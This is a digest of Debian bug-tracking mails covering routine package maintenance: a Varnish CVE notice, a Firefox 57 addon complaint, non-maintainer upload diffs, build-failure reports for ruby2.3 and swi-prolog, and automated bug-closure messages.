Bug#881808: varnish: CVE-2017-8807: Data leak - '-sfile' Stevedore transient objects
Source: varnish Version: 5.0.0-1 Severity: serious Tags: patch security upstream fixed-upstream Forwarded: https://github.com/varnishcache/varnish-cache/pull/2429 Control: fixed -1 5.0.0-7+deb9u2 Hi, the following vulnerability was published for varnish. CVE-2017-8807[0]: Data leak - '-sfile' Stevedore transient objects The fix for stretch-security has already been preared and will be released shortly, already marking the version as fixed accordingly since prepared before. If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2017-8807 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8807 [1] https://github.com/varnishcache/varnish-cache/pull/2429 [2] https://varnish-cache.org/security/VSV2.html Regards, Salvatore
Processed: varnish: CVE-2017-8807: Data leak - '-sfile' Stevedore transient objects
Processing control commands: > fixed -1 5.0.0-7+deb9u2 Bug #881808 [src:varnish] varnish: CVE-2017-8807: Data leak - '-sfile' Stevedore transient objects The source 'varnish' and version '5.0.0-7+deb9u2' do not appear to match any binary packages Marked as fixed in versions varnish/5.0.0-7+deb9u2. -- 881808: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881808 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881802: Firefox gets unusable and with broken security after update
severity 881802 normal thanks On 15/11/2017 11:44, Klaus Ethgen wrote: > Package: firefox > Version: 57.0-1 > Severity: grave > > The new update of firefox render it completely unusable and unsafe to > use as essential addons are disabled without asking the user. Lowering the severity as Firefox remains usable and safe. The features that you are mentioning are provided by extension and not by the Firefox package itself. In parallel, I guess some of them will be ported to 57 in the next few weeks. Last but not least, you can still use Firefox esr: https://tracker.debian.org/pkg/firefox-esr Where the extensions will probably work. Sylvestre
Processed: Re: Bug#881802: Firefox gets unusable and with broken security after update
Processing commands for cont...@bugs.debian.org: > severity 881802 normal Bug #881802 [firefox] Firefox gets unusable and with broken security after update Severity set to 'normal' from 'grave' > thanks Stopping processing here. Please contact me if you need assistance. -- 881802: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881802 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#872712: [Parl-devel] Bug#872712: debian-parl: please remove transitional packages myspell-{af, en-gb, en-za, it, ky, sl, sw, th} and use hunspell-* instead
On Mon, Sep 25, 2017 at 06:20:02PM +0200, Agustin Martin wrote: > On Mon, Aug 21, 2017 at 10:04:03AM +0200, Mattia Rizzolo wrote: > > On Mon, Aug 21, 2017 at 02:33:02AM +0200, Jonas Smedegaard wrote: > > > I will address this, but it may take time before I come around to it. > > > > > > Please do go ahead with removal of the reverse dependency (at least from > > > testing): debian-parl is currently kicked from testing for other > > > reasons. > > > > Ok, we will go ahead and remove them at the first occasion breaking > > debian-parl. > > Hi, > > Just to note that myspell-ca dependency should also be changed to > hunspell-ca. Andreas already changed bug title about this. Hi, Jonas, This part is still pending. > hunspell-ca package without myspell-ca has already been uploaded. However > it cannot migrate to testing because of debian-parl dependency on > myspell-ca (See #876732, myspell-ca cannot be removed from sid). Thanks in advance, -- Agustin
Bug#881062: NMU for this bug
Hi, This bug is blocking a bunch of package migration to Buster, so I've prepared an NMU. Debdiff is attached. I've uploaded the resulting package to DELAYED/5, to leave you enough time to upload it yourself if you prefer. I'm also available for sponsoring the package if you don't have enough rights in the Debian archive. Best regards, Thomas Goirand (zigo) diff -Nru flower-0.8.3+dfsg/debian/changelog flower-0.8.3+dfsg/debian/changelog --- flower-0.8.3+dfsg/debian/changelog 2017-05-22 12:30:55.0 + +++ flower-0.8.3+dfsg/debian/changelog 2017-11-15 11:04:06.0 + @@ -1,3 +1,11 @@ +flower (0.8.3+dfsg-2.1) unstable; urgency=medium + + * Non-maintainer upload. + * Using python-sphinxcontrib.httpdomain instead of the old transition +package with dash (Closes: #881062). + + -- Thomas GoirandWed, 15 Nov 2017 11:04:06 + + flower (0.8.3+dfsg-2) unstable; urgency=medium * Use local objects.inv to avoid internet access (Closes: #862246) diff -Nru flower-0.8.3+dfsg/debian/control flower-0.8.3+dfsg/debian/control --- flower-0.8.3+dfsg/debian/control2017-05-22 12:30:01.0 + +++ flower-0.8.3+dfsg/debian/control2017-11-15 11:04:06.0 + @@ -16,7 +16,7 @@ python-mock, python-setuptools (>= 0.6b3), python-sphinx, - python-sphinxcontrib-httpdomain, + python-sphinxcontrib.httpdomain, python-tornado, python3-all, python3-doc,
Bug#881804: ruby2.3 FTBFS on i386: TestFloat#test_round_with_precision failure
Source: ruby2.3 Version: 2.3.5-1 Severity: serious Tags: patch https://buildd.debian.org/status/fetch.php?pkg=ruby2.3=i386=2.3.5-1=1510668050=0 ... Finished tests in 490.087998s, 32.5941 tests/s, 4569.4386 assertions/s. 1) Failure: TestFloat#test_round_with_precision [/<>/test/ruby/test_float.rb:448]: <5.02> expected but was <5.01>. 15974 tests, 2239427 assertions, 1 failures, 0 errors, 78 skips ruby -v: ruby 2.3.5p376 (2017-09-14) [i386-linux-gnu] uncommon.mk:612: recipe for target 'yes-test-almost' failed make[2]: *** [yes-test-almost] Error 1 make[2]: Leaving directory '/<>' debian/rules:73: recipe for target 'override_dh_auto_test-arch' failed make[1]: *** [override_dh_auto_test-arch] Error 2 If the exact precision is required, the following fixes it: --- debian/rules.old2017-11-15 09:51:45.0 + +++ debian/rules2017-11-15 10:10:18.0 + @@ -11,6 +11,11 @@ export TESTOPTS DEB_HOST_MULTIARCH := $(shell dpkg-architecture -qDEB_HOST_MULTIARCH) +DEB_HOST_ARCH ?= $(shell dpkg-architecture -qDEB_HOST_ARCH) + +ifneq (,$(filter $(DEB_HOST_ARCH), i386)) +export DEB_CFLAGS_MAINT_APPEND=-ffloat-store +endif export SOURCE := $(shell dpkg-parsechangelog -SSource) export RUBY_VERSION := $(patsubst ruby%,%,$(SOURCE))
Processed: The bup FTBFS is fixed upstream
Processing control commands: > tags -1 fixed-upstream Bug #879213 [src:bup] bup FTBFS with git 1:2.15.0~rc1-1 Added tag(s) fixed-upstream. -- 879213: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=879213 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#879213: The bup FTBFS is fixed upstream
Control: tags -1 fixed-upstream Upstream fix: https://github.com/bup/bup/commit/292361d86d1cf0cc555681ae43371d66c8ebb366 cu Adrian -- "Is there not promise of rain?" Ling Tan asked suddenly out of the darkness. There had been need of rain for many days. "Only a promise," Lao Er said. Pearl S. Buck - Dragon Seed
Bug#876578: libykneomgr: diff for NMU version 0.1.8-2.2
Dear maintainer, I've uploaded another NMU for libykneomgr (versioned as 0.1.8-2.2) for adding a dblatex build dependency. cu Adrian -- "Is there not promise of rain?" Ling Tan asked suddenly out of the darkness. There had been need of rain for many days. "Only a promise," Lao Er said. Pearl S. Buck - Dragon Seed diff -Nru libykneomgr-0.1.8/debian/changelog libykneomgr-0.1.8/debian/changelog --- libykneomgr-0.1.8/debian/changelog 2017-10-21 13:08:23.0 +0300 +++ libykneomgr-0.1.8/debian/changelog 2017-11-15 12:47:23.0 +0200 @@ -1,3 +1,10 @@ +libykneomgr (0.1.8-2.2) unstable; urgency=medium + + * Non-maintainer upload. + * Add the missing build dependency on dblatex. + + -- Adrian BunkWed, 15 Nov 2017 12:47:23 +0200 + libykneomgr (0.1.8-2.1) unstable; urgency=medium * Non-maintainer upload. diff -Nru libykneomgr-0.1.8/debian/control libykneomgr-0.1.8/debian/control --- libykneomgr-0.1.8/debian/control 2016-07-25 11:26:06.0 +0300 +++ libykneomgr-0.1.8/debian/control 2017-11-15 12:46:50.0 +0200 @@ -5,7 +5,7 @@ Uploaders: Simon Josefsson Build-Depends: debhelper (>= 9), dh-autoreconf, libpcsclite-dev, libzip-dev, help2man, pkg-config, - gtk-doc-tools + gtk-doc-tools, dblatex Standards-Version: 3.9.8 Homepage: https://developers.yubico.com/libykneomgr/ Vcs-Git: https://github.com/Yubico/libykneomgr-dpkg.git
Bug#880235: NMU of the fix for this package
Hi, Since this is an RC bug, and that it hasn't been addressed for the last 15 days, I've prepared an NMU. It simply removes that last one assert in the failing test, which is enough to have everything working again. Debdiff is attached. I've uploaded to the DELAYED/5 queue. Cheers, Thomas Goirand (zigo) diff -Nru blockdiag-1.5.3+dfsg/debian/changelog blockdiag-1.5.3+dfsg/debian/changelog --- blockdiag-1.5.3+dfsg/debian/changelog 2017-06-04 03:08:49.0 + +++ blockdiag-1.5.3+dfsg/debian/changelog 2017-11-15 10:44:08.0 + @@ -1,3 +1,10 @@ +blockdiag (1.5.3+dfsg-5.1) unstable; urgency=medium + + * Non-maintainer upload. + * Add patch to remove one assert in test_node_attribute() (Closes: #880235). + + -- Thomas GoirandWed, 15 Nov 2017 10:44:08 + + blockdiag (1.5.3+dfsg-5) unstable; urgency=medium * debian/rules diff -Nru blockdiag-1.5.3+dfsg/debian/patches/remove-one-assert-in-test_node_attribute.patch blockdiag-1.5.3+dfsg/debian/patches/remove-one-assert-in-test_node_attribute.patch --- blockdiag-1.5.3+dfsg/debian/patches/remove-one-assert-in-test_node_attribute.patch 1970-01-01 00:00:00.0 + +++ blockdiag-1.5.3+dfsg/debian/patches/remove-one-assert-in-test_node_attribute.patch 2017-11-15 10:43:45.0 + @@ -0,0 +1,17 @@ +Description: Remove one assert in test_node_attribute +Author: Thomas Goirand +Bug-Debian: https://bugs.debian.org/880235 +Forwarded: no +Last-Update: 2017-11-15 + +--- blockdiag-1.5.3+dfsg.orig/src/blockdiag/tests/test_builder_node.py blockdiag-1.5.3+dfsg/src/blockdiag/tests/test_builder_node.py +@@ -95,7 +95,7 @@ class TestBuilderNode(BuilderTestCase): + self.assertNodeStacked(diagram, stacked) + self.assertNodeFontsize(diagram, fontsize) + self.assertNodeLabel_Orientation(diagram, orientations) +-self.assertNodeBackground(diagram, backgrounds) ++#self.assertNodeBackground(diagram, backgrounds) + + def test_node_height_diagram(self): + diagram = self.build('node_height.diag') diff -Nru blockdiag-1.5.3+dfsg/debian/patches/series blockdiag-1.5.3+dfsg/debian/patches/series --- blockdiag-1.5.3+dfsg/debian/patches/series 2017-06-04 02:06:07.0 + +++ blockdiag-1.5.3+dfsg/debian/patches/series 2017-11-15 10:42:59.0 + @@ -4,3 +4,4 @@ fixes-test_node_attribute.patch fixes_test_fontmap_duplicated_fontentry1.patch 848748-exception-ignored-in-Image-del.patch +remove-one-assert-in-test_node_attribute.patch
Bug#881802: Firefox gets unusable and with broken security after update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Package: firefox Version: 57.0-1 Severity: grave The new update of firefox render it completely unusable and unsafe to use as essential addons are disabled without asking the user. - - Foxproxy - In the setup where I use firefox, I need to configure proxy far behind the possibilities that firefox gives me. So without that addon, I am actually cut of from internet completely. On one hand, that is good as otherwise I would be endangered due to the following disabled addons. - - Noscript - Present internet is absolutely to dangerous to browse without Noscript. As a short term solution, JS could be completely disabled but it is needed to enable it on some trusted sites. - - HTTPS Everywhere - - Status-4-Evar - Without this addon, it is a blind flight without instruments to browse internet. Every link will be a surprise where it leads to. - - Y U no validate - Without that addon it is easily possible to accidentally accept an invalid TLS certificate forever. That opens up for many problems. - - DNSSEC/TLSA Validator - I need to be able to check the validity of TLSA entries. It is sad that firefox has no buildin check for that. But now it even disables the only addon that was able to verify them. - - Cookie Monster Beside that there are several addons that bring back some stuff that was dropped from firefox but without, browsing is impossible. - - Tabgruppen - Without that feature, I have about 1000 Tabs open at the same time. Firefox is unusable without that addon. - - Tab Mix Plus - The same, it makes Tabbed browsing even more usable. - - UAControl - Several sites require to set special UA to be able to access them. Including some embedded devices I need to use at work. "Funny" think ist that noscript was updated too but the update is incompatible to currect firefox. - -- System Information: The problem happened on a host without direct access to the internet so I deleted the informations from the host where I report that bug from. Note also, that the paging output of firefox prereportbug scripts break the further usage of reportbug. - -- Klaus Ethgen http://www.ethgen.ch/ pub 4096R/4E20AF1C 2011-05-16Klaus EthgenFingerprint: 85D4 CA42 952C 949B 1753 62B3 79D0 B06F 4E20 AF1C -BEGIN PGP SIGNATURE- Comment: Charset: ISO-8859-1 iQGzBAEBCgAdFiEEMWF28vh4/UMJJLQEpnwKsYAZ9qwFAloMGpAACgkQpnwKsYAZ 9qzMXgwAs2Bgn9+53ZSfMqNtOsD3olD4Luf/CUQh1KNVdlCiko+E22OLj0HAkuMO /JJsowwURhbQ8chHHBXMRtPkH6VPzjP8VqpGpyVFCwA9S/xob6tQ3tdfgIq57O48 uyQIy1u+V65KFdCXGFaM0LOa9+vaQXXIPQosJGk50RSXfuI1TutYRnksH2tsPtMp PhZLbj9dMPQ4s/UX3fxlx0XiI2Y6PTjpuf2NYa5VErtygI+7NWnz0p8Pyz/ioT7k rgs3Aq4LvPU5BHnxMYsXcfVohqrBRDzide8TbhSlgRCqJOQxV57lFVBEBecG0Wmi vdbDgErdklI+Ds9H6/8ifNXxsxEIIuqNKnQqy84thEsVF3n6YBjgGo2qG3cf/Npl POYLN1iG2meAR37HBjakgGaqqeDTGn36KiPg2kBQ7+L29BqwpO3RAerOMFSn9gLF /0PMEJgNX8MlJyo9ormPWpin6Z9LYd+/zXXu/dqfr9kix+mPNKLndQPnUhqrUzCc dchu7PuP =lJO8 -END PGP SIGNATURE-
Processed: Version tracking fix
Processing commands for cont...@bugs.debian.org: > found 881764 7u111-2.6.7-1 Bug #881764 [src:openjdk-7] openjdk-7: several vulnerabilities Marked as found in versions openjdk-7/7u111-2.6.7-1. > thanks Stopping processing here. Please contact me if you need assistance. -- 881764: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881764 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881756: swi-prolog: FTBFS on mips: Build killed with signal TERM
On Wed, Nov 15, 2017 at 02:30:54PM +0500, Lev Lamberov wrote: > Hi Adrian, Hi Lev, > Ср 15 ноя 2017 @ 08:06 Adrian Bunk: >... > > Same randomness on powerpcspe, and both have it already with 7.6.1+dfsg-1: > > https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpc > > https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpcspe >... > At least, I cannot think of any other reason that 7.6.1-1 > was built successfully on mips and 7.6.1-2 failed, where the only one > change is disabling Java tests (due to CVE-2017-1000364). I've uploaded > 7.6.1-2 on the next day after 7.6.1-1 upload. you already quoted the reason: > The main issue > seems to be weaker read/write ordering constraints that break our > lock-free data structures, resulting in more or less random bugs. Based on the mips/powerpc/powerpcspe results one could say that there is a 50% chance that a build attempt fails. That would give a 37.5% probability for 2 builds failing and one succeeding when trying 3 times. Considering the older mips failure and the more frequent powerpc/powerpcspe failures, the 7.6.1-1 success might just have been "luck". > Cheers! > Lev cu Adrian -- "Is there not promise of rain?" Ling Tan asked suddenly out of the darkness. There had been need of rain for many days. "Only a promise," Lao Er said. Pearl S. Buck - Dragon Seed
Processed: reassign 881743 fonts-roboto-fontface
Processing commands for cont...@bugs.debian.org: > reassign 881743 fonts-roboto-fontface Bug #881743 [openstack-dashboard] openstack-dashboard: fails to upgrade from 'stretch': Couldn't find anything to import: /horizon/lib/roboto_fontface/css/roboto-fontface.scss Bug reassigned from package 'openstack-dashboard' to 'fonts-roboto-fontface'. No longer marked as found in versions horizon/3:12.0.0-2. Ignoring request to alter fixed versions of bug #881743 to the same values previously set > End of message, stopping processing here. Please contact me if you need assistance. -- 881743: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881743 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: Merge duplicates
Processing commands for cont...@bugs.debian.org: > reassign 881742 src:caffeine Bug #881742 [caffeine] caffeine will not start: ImportError: cannot import name '_gi' Bug reassigned from package 'caffeine' to 'src:caffeine'. No longer marked as found in versions caffeine/2.8.3-3. Ignoring request to alter fixed versions of bug #881742 to the same values previously set > forcemerge 880280 881742 Bug #880280 [src:caffeine] caffeine: FTBFS: dpkg-buildpackage: error: dpkg-source -b caffeine-2.8.3 subprocess returned exit status 2 Bug #881742 [src:caffeine] caffeine will not start: ImportError: cannot import name '_gi' Severity set to 'serious' from 'grave' Marked as found in versions caffeine/2.8.3-3. Added tag(s) buster and sid. Merged 880280 881742 > affects 880280 caffeine Bug #880280 [src:caffeine] caffeine: FTBFS: dpkg-buildpackage: error: dpkg-source -b caffeine-2.8.3 subprocess returned exit status 2 Bug #881742 [src:caffeine] caffeine will not start: ImportError: cannot import name '_gi' Added indication that 880280 affects caffeine Added indication that 881742 affects caffeine > thanks Stopping processing here. Please contact me if you need assistance. -- 880280: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=880280 881742: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881742 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#879631: closed by Paulo Henrique de Lima Santana <p...@softwarelivre.org> ()
Control: reopen -1 On Tue, Nov 14, 2017 at 12:42:04PM +, Debian Bug Tracking System wrote: > > Date: Tue, 14 Nov 2017 10:30:01 -0200 > From: Paulo Henrique de Lima Santana> To: 879631-d...@bugs.debian.org > > Hi, > > This package will be used as a dependency in a new package I'm doing as you > can see below. > https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=858916 > > So, It is not useless and I need to keep it in Debian. The missing dependency is an RC bug in any case. > Best regards, cu Adrian -- "Is there not promise of rain?" Ling Tan asked suddenly out of the darkness. There had been need of rain for many days. "Only a promise," Lao Er said. Pearl S. Buck - Dragon Seed
Processed: Re: Bug#879631 closed by Paulo Henrique de Lima Santana <p...@softwarelivre.org> ()
Processing control commands: > reopen -1 Bug #879631 {Done: Paulo Henrique de Lima Santana} [python3-flask-socketio] python3-flask-socketio: missing dependency Bug reopened Ignoring request to alter fixed versions of bug #879631 to the same values previously set -- 879631: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=879631 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: Add affects
Processing commands for cont...@bugs.debian.org: > affects 881705 src:syslog-ng-incubator Bug #881705 [syslog-ng-dev] syslog-ng-dev: syslog-ng.pc still requires eventlog Added indication that 881705 affects src:syslog-ng-incubator > thanks Stopping processing here. Please contact me if you need assistance. -- 881705: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881705 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: tagging 881793
Processing commands for cont...@bugs.debian.org: > tags 881793 + pending Bug #881793 [src:daisy-player] fix ftbfs with updated libcdio-paranoia Added tag(s) pending. > thanks Stopping processing here. Please contact me if you need assistance. -- 881793: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881793 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881756: swi-prolog: FTBFS on mips: Build killed with signal TERM
Hi Adrian, Ср 15 ноя 2017 @ 08:06 Adrian Bunk: > On Wed, Nov 15, 2017 at 12:55:12AM +0500, Lev Lamberov wrote: >>... >> The most strange thing is that 7.6.1-1 built successfully on mips. The >> only difference between 7.6.1-1 and 7.6.1-2 is that java tests (only >> tests) are disabled now (via debian/rules). > > 7.3.33+dfsg-1 failed the same way a year ago: > https://buildd.debian.org/status/logs.php?pkg=swi-prolog=mips > > I would not rule out that this might be an old bug causing random build > failures, that either just happened twice in the row or became more > likely due to some change somewhere. In the past there were some wierd build problems from time to time. You can find logs and build history in usual place. These build problems were unreproducible and were typically resolved with rebuilding. Not that time. >> Note that the 7.6.1-2 >> version builds successfully on mipsel and mips64el (little-endian), but >> fails on mips (big-endian). > >> The similar problem occures on powerpc [1][2], which also works in >> big-endian mode: >>... > > Same randomness on powerpcspe, and both have it already with 7.6.1+dfsg-1: > https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpc > https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpcspe True. And as I can see powerpcspe also works in big-endian mode. I've informed upstream about the issue. Their answer is as follows: > Interesting. I doubt this is due to big/little endian. The main issue > seems to be weaker read/write ordering constraints that break our > lock-free data structures, resulting in more or less random bugs. A > number of the tests stress these parts of the system. The test_cgc > is one of them, while I'm pretty sure there are no endian issues in > that code. > > Keri and I did a lot of stress-testing and code reviewing for this after > we discovered this was the reason for a crash on ARM. The same problem > easily reproduced on powerpc. After the fixes for 7.6.1, a couple of > runs of the test suite passed ok on powerpc. I only ran many iterations > for tests that causes problems before. Upstream will try to run these stress tests on powerpc and mips again, but they claim that they were not able to reproduce some issues with these tests in 7.6.1. Guess the issue may be related to Debian build environment. At least, I cannot think of any other reason that 7.6.1-1 was built successfully on mips and 7.6.1-2 failed, where the only one change is disabling Java tests (due to CVE-2017-1000364). I've uploaded 7.6.1-2 on the next day after 7.6.1-1 upload. Cheers! Lev
Bug#880958: marked as done (yapf3 explicitly depends on python3.5)
Your message dated Wed, 15 Nov 2017 09:00:40 + with message-idand subject line Bug#880958: fixed in yapf 0.19.0-1 has caused the Debian Bug report #880958, regarding yapf3 explicitly depends on python3.5 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 880958: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=880958 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: yapf3 Version: 0.17.0-1 Severity: serious Tags: sid buster yapf3 explicitly depends on python3.5. One mistake certainly is the b-d on python3-all, which is wrong for an application-only package. And if this package is application-only, why ship both Python2 and Python3 vesions? --- End Message --- --- Begin Message --- Source: yapf Source-Version: 0.19.0-1 We believe that the bug you reported is fixed in the latest version of yapf, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 880...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Ana Custura (supplier of updated yapf package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Mon, 13 Nov 2017 18:11:05 + Source: yapf Binary: python-yapf yapf python3-yapf yapf3 Architecture: source all Version: 0.19.0-1 Distribution: unstable Urgency: medium Maintainer: Ana Custura Changed-By: Ana Custura Description: python-yapf - public modules for yapf (Python 2) python3-yapf - public modules for yapf (Python 3) yapf - Python code formatter for different styles (Python 2) yapf3 - Python code formatter for different styles (Python 3) Closes: 879196 880958 Changes: yapf (0.19.0-1) unstable; urgency=medium . * New upstream version 0.19.0 * debian/control: -splits package into modules and binaries (closes: #880958, #879196 ) -updates Debian policy to 4.1.1 * debian/rules: -enables tests at build-time -excludes test from running (see https://github.com/google/yapf/issues/469) * debian/tests/control: -enables testing with autopkgtest Checksums-Sha1: 95b6073d505f749fbac863518bd0bb47c6ddd9ed 1782 yapf_0.19.0-1.dsc b699ad5f7fbfe95324c4fd800e52c08644f4303f 131470 yapf_0.19.0.orig.tar.gz 08fb66326cfc3ba181a7f5240d48d2d8a81c3591 3248 yapf_0.19.0-1.debian.tar.xz 6ec78faccacbb48ef65c1037697084c12eaeefcb 99468 python-yapf_0.19.0-1_all.deb e6da8570ca52b2372182799b895b0de041e1ef41 99556 python3-yapf_0.19.0-1_all.deb 1800f1ec3dd06d803930832bb04beb14459715da 20196 yapf3_0.19.0-1_all.deb 0b087f4d55eea3a626401185f305b261362d22f0 20180 yapf_0.19.0-1_all.deb 4ad97780c38849c1d0fca15a2846691c59fd6531 6522 yapf_0.19.0-1_amd64.buildinfo Checksums-Sha256: 7df09f3ba15b842f299a3cffc07351ec5d94b722443dee0b46b8e543e93731bc 1782 yapf_0.19.0-1.dsc 018d9b9ae31df87610c0dd1a96b3c76854a050674678db003fabe87707c57f8c 131470 yapf_0.19.0.orig.tar.gz a3a3804c2d313f6f861bd7de1616729d127073374eef54803730884288d17409 3248 yapf_0.19.0-1.debian.tar.xz e5c42c8d00ed0a8c7f5806a60dfc297eb0362e15b2e0cb4f3d5426f7e43391db 99468 python-yapf_0.19.0-1_all.deb 2ce7ea831d25791beb9547993b4567143e0f7997091c7695bb5fcceb3806c7b7 99556 python3-yapf_0.19.0-1_all.deb 6f92f093b51b160230f4aa5b927101f4912330fe82d2c96a4578b310daa328ed 20196 yapf3_0.19.0-1_all.deb d4f360c1d609fc77740c6bd646e7b909bf1701da9c42b418ad3239002a5e57cb 20180 yapf_0.19.0-1_all.deb 1342a7f3f97caec42b5c2ab25d008bc0179a3d27e0149ab9c0ec78887704242a 6522 yapf_0.19.0-1_amd64.buildinfo Files: d5db521361c34478d927c1946d168d58 1782 python optional yapf_0.19.0-1.dsc 5e828d4278bc3a55adf39d9640a6dffd 131470 python optional yapf_0.19.0.orig.tar.gz d5d1bec81bc3812963a911bb10e33150 3248 python optional yapf_0.19.0-1.debian.tar.xz b55039c2575b1b969e019fedb60522e7 99468 python optional python-yapf_0.19.0-1_all.deb 321e19a05bf058e7ccc9cbee402f045b 99556 python optional python3-yapf_0.19.0-1_all.deb 6f9a0e0a67b9e726ff5aa6520a802744 20196 python optional yapf3_0.19.0-1_all.deb 763748f1f63ff7a5fccd92ca0acdb7e5 20180 python optional yapf_0.19.0-1_all.deb e1ea2643a20175f9120f2ab0a28fdf16 6522 python optional
Bug#877210: marked as done (normaliz FTBFS on i386/armhf: Some error in the normaliz input data detected: Error while reading grading (a 1x2 matrix) !)
Your message dated Wed, 15 Nov 2017 09:00:20 + with message-idand subject line Bug#877210: fixed in normaliz 3.4.1+ds-1 has caused the Debian Bug report #877210, regarding normaliz FTBFS on i386/armhf: Some error in the normaliz input data detected: Error while reading grading (a 1x2 matrix) ! to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 877210: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=877210 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: normaliz Version: 3.1.1+ds-1 Severity: serious Tags: buster sid Some recent change in unstable makes normaliz FTBFS on i386/armhf (could be on all 32bit architectures): https://tests.reproducible-builds.org/debian/history/normaliz.html https://tests.reproducible-builds.org/debian/rb-pkg/unstable/i386/normaliz.html ... /usr/bin/make -C test NORMALIZ=/build/1st/normaliz-3.1.1+ds/_build/normaliz make[2]: Entering directory '/build/1st/normaliz-3.1.1+ds/test' /build/1st/normaliz-3.1.1+ds/_build/normaliz -s test-s/23 Some error in the normaliz input data detected: Error while reading grading (a 1x2 matrix) ! BadInputException caught... exiting. Makefile:54: recipe for target 'test-s/23.out' failed make[2]: *** [test-s/23.out] Error 1 --- End Message --- --- Begin Message --- Source: normaliz Source-Version: 3.4.1+ds-1 We believe that the bug you reported is fixed in the latest version of normaliz, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 877...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Jerome Benoit (supplier of updated normaliz package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Wed, 15 Nov 2017 06:15:30 + Source: normaliz Binary: normaliz libnormaliz3 libnormaliz-dev libnormaliz-dev-common normaliz-bin normaliz-doc Architecture: source all amd64 Version: 3.4.1+ds-1 Distribution: unstable Urgency: medium Maintainer: Debian Science Maintainers Changed-By: Jerome Benoit Description: libnormaliz-dev - math computing tools for affine monoids, rational polytopes and c libnormaliz-dev-common - math computing tools for affine monoids, rational polytopes and c libnormaliz3 - math computing tools for affine monoids, rational polytopes and c normaliz - math computing tools for affine monoids, rational polytopes and c normaliz-bin - math computing tools for affine monoids, rational polytopes and c normaliz-doc - math computing tools for affine monoids, rational polytopes and c Closes: 877210 Changes: normaliz (3.4.1+ds-1) unstable; urgency=medium . * New upstream minor version (Closes: #877210). * Debianization: - debian/copyright, refresh; - debian/control: - debhelper, bump to 10 (see d/rules); - Standards Version, bump to 4.1.1 (no change); - discard the debug symbols package libnormaliz0-dbg; - Build-Depends-Indep field, neutralize; - debian/watch: - version, bump to 4; - path, refresh to upstream GitHUB site path; - debian/rules: - debhelper, bump to 10; - doc composition, neutralize. Checksums-Sha1: 28fff2497c0d786e5a440da2554dfe4c201dfa49 3078 normaliz_3.4.1+ds-1.dsc f88d2a7292576247f62913b0bbdc619ed7682b08 1334860 normaliz_3.4.1+ds.orig.tar.xz 52ca94272727d32cd8bc84a7396c86e8a76b6e11 4928 normaliz_3.4.1+ds-1.debian.tar.xz 2a454cb30707e6f428d6f86c626272105dbd43c0 24568 libnormaliz-dev-common_3.4.1+ds-1_all.deb 192cc9e5bb8d8258e9f170fd5b71afaec6b10ff6 551676 libnormaliz-dev_3.4.1+ds-1_amd64.deb d447f91c6935b8a0dd91a6e128cef71c669e69fe 5473852 libnormaliz3-dbgsym_3.4.1+ds-1_amd64.deb c0d8ec69032bcfff8a4770fb8c94079db2cdf9ce 589736 libnormaliz3_3.4.1+ds-1_amd64.deb fddbb0e4acb339cc049a09152628165108fffbcb 671784 normaliz-bin-dbgsym_3.4.1+ds-1_amd64.deb f088f1945d3939d37ef2fe45713b2359e50f8f48 73700 normaliz-bin_3.4.1+ds-1_amd64.deb 4b1d5e70a6ad78f6a4da8beba35cde9cdf9f0696 701284 normaliz-doc_3.4.1+ds-1_all.deb 0e65d95ed239d6bf1196c1afd91d6fcfde7221c9 8309
Bug#881756: swi-prolog: FTBFS on mips: Build killed with signal TERM
